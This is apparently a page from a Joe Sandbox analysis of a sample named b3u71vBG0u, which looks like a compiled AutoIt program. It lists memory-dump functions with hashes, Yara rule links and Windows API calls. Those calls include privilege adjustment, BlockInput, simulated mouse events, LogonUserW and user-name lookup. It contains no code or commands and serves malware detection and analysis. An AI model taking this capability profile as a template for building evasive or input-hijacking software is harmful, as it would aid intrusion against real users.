Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 4ca2532246beffbc8c46c75741045fd2cb72509ef5deb3c3a46d1ea8d0ece57e
Instruction ID: 3c3bd1fa421ddb86ec007861dac7c5ce8354dc97757a874472d95d31b061640a
Opcode Fuzzy Hash: 4ca2532246beffbc8c46c75741045fd2cb72509ef5deb3c3a46d1ea8d0ece57e
Instruction Fuzzy Hash: 341186B2D00228BEE7109BE8DC44FAFBBBCEB89710F004656FA04E7191C2B95D0547A1

Function 007A4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007A4C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007A4C43
FreeSid.ADVAPI32(?), ref: 007A4C53

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 7f03769212c986dfa753919224f7f494ec9a13f08c24ce1be1e6f5273c7ba2c0
Instruction ID: dd1cc1d49bf33f51485d5607ba52f86591f80f2857c47c6046bbeb0a0934ec9d
Opcode Fuzzy Hash: 7f03769212c986dfa753919224f7f494ec9a13f08c24ce1be1e6f5273c7ba2c0
Instruction Fuzzy Hash: BEF03775A51208BBDB04DFE09C89EAEBBB9EB08611F0084A9E901E2181E6756A448B54

Function 0074E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdc0bf38f9aa08127838bf9e38ee912893ae26df32f614ea579e708073bcd1c1
Instruction ID: 70d0668677e76e142a60bd4687cc26161ad2b4123a884a0cfea8b9ce3a187ac2
Opcode Fuzzy Hash: bdc0bf38f9aa08127838bf9e38ee912893ae26df32f614ea579e708073bcd1c1
Instruction Fuzzy Hash: 1C22AFB0A00219DFDB24DF58C484ABEBBF1FF04320F148569E856AB351E778AD85CB91

Function 007AC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007AC966
FindClose.KERNEL32(00000000), ref: 007AC996

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: fe7c5964ab899ecfb3eac458647d0741e0df20e8d6523bcc80170e0d36a8793c
Instruction ID: 9f77f0aae07b5d336d5dcc7187c6df8645d068d5d3d03d6bc487e38689a42c96
Opcode Fuzzy Hash: fe7c5964ab899ecfb3eac458647d0741e0df20e8d6523bcc80170e0d36a8793c
Instruction Fuzzy Hash: 5F1130716106009FDB109F29D849A6AB7E9EF85324F00C65EF9A5D7291DB34A800CB81

Function 007AA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007B977D,?,007CFB84,?), ref: 007AA302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007B977D,?,007CFB84,?), ref: 007AA314

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 48b9150fea03afe4c97970d640958752987032ffb0291b8d6728b19ae104f187
Instruction ID: 019871d0868436c68abcc074d4ad61b35bf2609a125129b8caa9f0b11049cf88
Opcode Fuzzy Hash: 48b9150fea03afe4c97970d640958752987032ffb0291b8d6728b19ae104f187
Instruction Fuzzy Hash: EAF0823554422DFBDB10AFA4CC49FEA776DBF09761F008269F908D6191D7349944CBA1

Function 00798713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00798851), ref: 00798728
CloseHandle.KERNEL32(?,?,00798851), ref: 0079873A

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 3c0b083f1a3a48484916e2e1b0ba36962f2c46f9e12107a4bb9a7c715447979a
Instruction ID: c2517ee7ad2bc89fa6cfaf050340d0fbf523cf2e9cd35163189c2f0d6bde299d
Opcode Fuzzy Hash: 3c0b083f1a3a48484916e2e1b0ba36962f2c46f9e12107a4bb9a7c715447979a
Instruction Fuzzy Hash: D1E0B676010A50EEEB252B60FD09D777BAAEB04750724882EF89780470DB66AC90DB50

Function 0076A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00768F97,?,?,?,00000001), ref: 0076A39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0076A3A3

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eb374efd2ab099b5b5b5a2ea54dd17004bfcdd9d8d0be2b8f05e308f435f587c
Instruction ID: 1efdfeaed302e4e85d56b87a2c369ea146a2e9ada2255a515f359cda565f44b8
Opcode Fuzzy Hash: eb374efd2ab099b5b5b5a2ea54dd17004bfcdd9d8d0be2b8f05e308f435f587c
Instruction Fuzzy Hash: 71B09231054248BBCA002B91EC09F883F6AEB84AA2F408024FA0D84060CB6656508A99

Function 0076F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5cadebd90fc2fbabad9aa6d12599aae8107fc19f19ba3a26e7c1118e6dba045
Instruction ID: e52a4035309c5b7feb31acd5e6cbb7dd24b024b498af72e6ffcf9e8f3ea58c5e
Opcode Fuzzy Hash: a5cadebd90fc2fbabad9aa6d12599aae8107fc19f19ba3a26e7c1118e6dba045
Instruction Fuzzy Hash: 0D321162D6AF414DD7279634E832336A359AFB73C4F14D737EC1AB5AA6EB2C84834104

Function 0077267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2f14b989d895f1311f04826bd12e6934cfd733a47e13ff5eae4593b2f757809
Instruction ID: 36573127bc8c5a2481fab5395590ccc370bb4a0b1054ad857d36b84cc6b5a9d3
Opcode Fuzzy Hash: b2f14b989d895f1311f04826bd12e6934cfd733a47e13ff5eae4593b2f757809
Instruction Fuzzy Hash: E4B1EE20E2AF414DD62396398831336BB6CBFBB2C5F52D71BFC6A70D22EB2585834145

Function 007A8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 007A8B25

Part of subcall function 0076543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007A91F8,00000000,?,?,?,?,007A93A9,00000000,?), ref: 00765443
Part of subcall function 0076543A: __aulldiv.LIBCMT ref: 00765463

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: ef67a3452057c95bd7d5dd4ffacb92ae36386042b3940868b84675d1ed0a5693
Instruction ID: 4013ebf3063f7f57a04d746948ccc0ee6ecec45a73f354cc6dd9e6bbd4a286a4
Opcode Fuzzy Hash: ef67a3452057c95bd7d5dd4ffacb92ae36386042b3940868b84675d1ed0a5693
Instruction Fuzzy Hash: AE21A272625510CBC769CF29D841A52B3E1EBA5311B288F6CD1E5CB2D0CA74B945CB94

Function 007B41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 007B4218

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: f2cc0d3bd1a1bea68cfd88fdae51b6199751f39f66c52a075cb4a8a758941be0
Instruction ID: 12de7c0471ce8d0a96059018a51f4fa87ef2ec4fcc20e6a11b1196cfe45fc082
Opcode Fuzzy Hash: f2cc0d3bd1a1bea68cfd88fdae51b6199751f39f66c52a075cb4a8a758941be0
Instruction Fuzzy Hash: BDE01A712402149FC710AF69D844ADAB7E8AF94760F00802AF949D7352DA78A8408BA0

Function 007A4EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 007A4F18

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 2987744be289acb8d0d37a2a180419dc074db3be1d53292170673c7e1a32d7a8
Instruction ID: 239489e6d21ae195304163f82e3f0ba994c06e0975944492b55719c90d1bc188
Opcode Fuzzy Hash: 2987744be289acb8d0d37a2a180419dc074db3be1d53292170673c7e1a32d7a8
Instruction Fuzzy Hash: 14D05EB01A82057CFC184B24BC0FF760219E3C2781F8C6B897301854C1A9EF6810A034

Function 00798C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007988D1), ref: 00798CB3

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 357a6effc7837a37eddde82521b948638138efe51363f29d99ebfb578964914b
Instruction ID: e2be0ad7fb59c89ef222d8d3311767c868aa6837693dbdf2b5da42aad3d75db4
Opcode Fuzzy Hash: 357a6effc7837a37eddde82521b948638138efe51363f29d99ebfb578964914b
Instruction Fuzzy Hash: 48D05E3226090EABEF018EA4DC01EAE3B6AEB04B01F408111FE15C50A1C775D835AB60

Function 00782230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00782242

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a8edc0b613333c3a932d822b0bd87fd3e56164c23c41738b630274c091cbd3df
Instruction ID: cbc941294e484c01850ff7ec752420d1570b35e7fa40f24ef55944a3037ddbc0
Opcode Fuzzy Hash: a8edc0b613333c3a932d822b0bd87fd3e56164c23c41738b630274c091cbd3df
Instruction Fuzzy Hash: 23C04CF1801109DBDB05DB90D988DFE77BDAB04304F104066E102F2100D7789B448B71

Function 0076A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0076A36A

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 51a064a635f18a7d01f06f8ac7eeb017e60e8e2b6eb718a8223399692e5f06f4
Instruction ID: 9f88c066652b19e7cd74d727de051b5f95aaf155ca7fc1d7ab21dcda763b6cd7
Opcode Fuzzy Hash: 51a064a635f18a7d01f06f8ac7eeb017e60e8e2b6eb718a8223399692e5f06f4
Instruction Fuzzy Hash: 6AA0113000020CBB8A002B82EC08888BFAEEA802A0B008020F80C800228B32AA208A88

Function 00758A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 353e30c706b744169c7195b447a1a9df8c431ce94646a5e248ffa0f17e790035
Instruction ID: 89ac0b11bbdcac4f8f596c90480acb901e6df826864b4ff013bd605461c8a518
Opcode Fuzzy Hash: 353e30c706b744169c7195b447a1a9df8c431ce94646a5e248ffa0f17e790035
Instruction Fuzzy Hash: 88227B30501625CBDF69CF18D4846FD77A1FB41305F2484AADC52AB291EBBC9D89CB72

Function 00762405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 0b9d7878ca994be2eb05eb955308540c284d3de94be77ded40101ef9a76945ee
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 07C1A23220649309DB6D4639D43407FBAE15BA27B135E0B5DECB3CB5C6EF28D525EA20

Function 0076283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: e4a9875a3ce404c53b4dd954e51a2b0ee46eb2818a38733d0aa7e10e93977a38
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 1EC1C43220659309DB6D463A843407FBBE15BA27B135E0B6DECB3DB4C5EF28D525E620

Function 007B7B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007B7B70
DeleteObject.GDI32(00000000), ref: 007B7B82
DestroyWindow.USER32 ref: 007B7B90
GetDesktopWindow.USER32 ref: 007B7BAA
GetWindowRect.USER32(00000000), ref: 007B7BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007B7CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007B7D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7D4A
GetClientRect.USER32(00000000,?), ref: 007B7D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007B7D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7DB2
